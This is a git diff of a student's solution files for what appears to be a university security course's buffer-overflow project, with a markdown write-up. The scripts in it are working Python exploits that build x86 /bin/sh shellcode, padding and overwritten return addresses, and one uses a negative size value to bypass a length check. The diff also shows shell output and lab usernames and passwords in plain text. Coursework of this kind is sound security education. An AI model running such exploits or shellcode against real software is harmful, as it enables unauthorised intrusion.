diff --git a/proj1/explain.md b/proj1/explain.md
index 2d094abfb2a247abf306d0a75acdf4f0f679d000..373fd730c264f3d1c42e9776b2d8dfb291d24c0a 100644
--- a/proj1/explain.md
+++ b/proj1/explain.md
@@ -59,7 +59,6 @@ Next password: 37ZFBrAPm8
 
 My code is attached below
 ```
-############# egg3
 #!/usr/bin/python3
 
 def fuck8(txt):
@@ -83,18 +82,70 @@ shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e13
 ########################################################################################### <- append an endline (0x0a, \n)
 
 payload = revert(fill) + revert(raddr) + (shellcode)
-print(payload)
+#print(payload)
 
 import binascii
 
 b = binascii.unhexlify(payload)
-with open('input.txt','wb+') as f:
+with open('/dev/fd/1','wb') as f:
     f.write(b)
-############# egg
-#!/bin/bash
-
-./egg3 > /dev/null
-cat input.txt # | invoke dejavu
 ```
 
 ## 2
+
+Just do as what I did in problem 1. I can see the return address is 0x00400775, stored at &msg+128+20.
+Because the buffer is large enough, I'll put payload here. &msg is 0xbffffa18, so I must change 0x00400775
+to 0xbffffa18.
+
+Oh I didn't tell you how should I bypass the `size` limit. Just put a `-1` and enjoy your day.
+
+Now I can see
+
+```
+pwnable:~$ ./exploit 
+j1X̀�É�jFX̀1�Ph//shh/binT[PS��1Ұ
+
+�
+/home/smith $ id
+uid=1003(brown) gid=1002(smith) groups=1002(smith)
+/home/smith $ cat README
+Welcome to the real world.
+
+Next username: brown
+Next password: mXFLFR5C62
+```
+
+My code is attached below.
+```
+#!/usr/bin/python3
+
+def fuck8(txt):
+    assert(len(txt) == 8)
+    return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
+
+def revert(txt):
+    assert(len(txt) % 8 == 0)
+    res = ""
+    for i in range(int(len(txt) / 8)):
+        res += fuck8(txt[i*8:(i+1)*8])
+    return res
+
+
+raddr = "bffffa18"
+#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
+shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a"
+
+length_to_fill = 20 + 128 - int(len(shellcode)/2)
+fill = "01" * length_to_fill
+
+int8_neg1 = "ff"
+
+payload = int8_neg1 + (shellcode) + fill + revert(raddr)
+#print(payload)
+
+import binascii
+
+b = binascii.unhexlify(payload)
+with open('/dev/fd/1','wb') as f:
+    f.write(b)
+```
diff --git a/proj1/solution/egg b/proj1/solution/egg
deleted file mode 100755
index 53cff3d089b5d3ac332d8315f444df22a79dd3c9..0000000000000000000000000000000000000000
--- a/proj1/solution/egg
+++ /dev/null
@@ -1,5 +0,0 @@
-#!/bin/bash
-
-./egg3 > /dev/null
-cat input.txt # | invoke dejavu
-
diff --git a/proj1/solution/egg3 b/proj1/solution/egg1
similarity index 94%
rename from proj1/solution/egg3
rename to proj1/solution/egg1
index 1175b9ec7be4ac6d937adba486b2291fbba85743..46721b5bc1bf7ca0fc5fb26d03023676f09b8fed 100755
--- a/proj1/solution/egg3
+++ b/proj1/solution/egg1
@@ -21,11 +21,11 @@ shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e13
 ########################################################################################### <- append an endline (0x0a, \n)
 
 payload = revert(fill) + revert(raddr) + (shellcode)
-print(payload)
+#print(payload)
 
 import binascii
 
 b = binascii.unhexlify(payload)
-with open('input.txt','wb+') as f:
+with open('/dev/fd/1','wb') as f:
     f.write(b)
 
diff --git a/proj1/solution/egg2 b/proj1/solution/egg2
new file mode 100755
index 0000000000000000000000000000000000000000..7f01c7b55399400ae1f06599a8467adf74031184
--- /dev/null
+++ b/proj1/solution/egg2
@@ -0,0 +1,33 @@
+#!/usr/bin/python3
+
+def fuck8(txt):
+    assert(len(txt) == 8)
+    return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
+
+def revert(txt):
+    assert(len(txt) % 8 == 0)
+    res = ""
+    for i in range(int(len(txt) / 8)):
+        res += fuck8(txt[i*8:(i+1)*8])
+    return res
+
+# cs161-atw
+raddr = "bffffa18"
+#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
+shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a"
+
+length_to_fill = 20 + 128 - int(len(shellcode)/2)
+fill = "01" * length_to_fill
+
+int8_neg1 = "ff"
+
+payload = int8_neg1 + (shellcode) + fill + revert(raddr)
+#print(payload)
+
+import binascii
+
+b = binascii.unhexlify(payload)
+with open('/dev/fd/1','wb') as f:
+    f.write(b)
+
+
diff --git a/proj1/ssh.sh b/proj1/ssh.sh
index 5254c96bc4328afe22e129c85e41fc73b733168e..7588d59878cc0aee8820f194f088f06b99f6c7ee 100755
--- a/proj1/ssh.sh
+++ b/proj1/ssh.sh
@@ -5,5 +5,6 @@ if [[ $1 == remote ]]; then
     ssh -t cs161-$u@hive$((36#${u:2}%26+1)).cs.berkeley.edu \~cs161/proj1/start
 else
     echo 'Connecting localhost...'
-    sshpass -p r4e8kWpeFC ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  vsftpd@localhost -p 16161
+    #sshpass -p r4e8kWpeFC ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  vsftpd@localhost -p 16161
+    sshpass -p 37ZFBrAPm8 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  smith@localhost -p 16161
 fi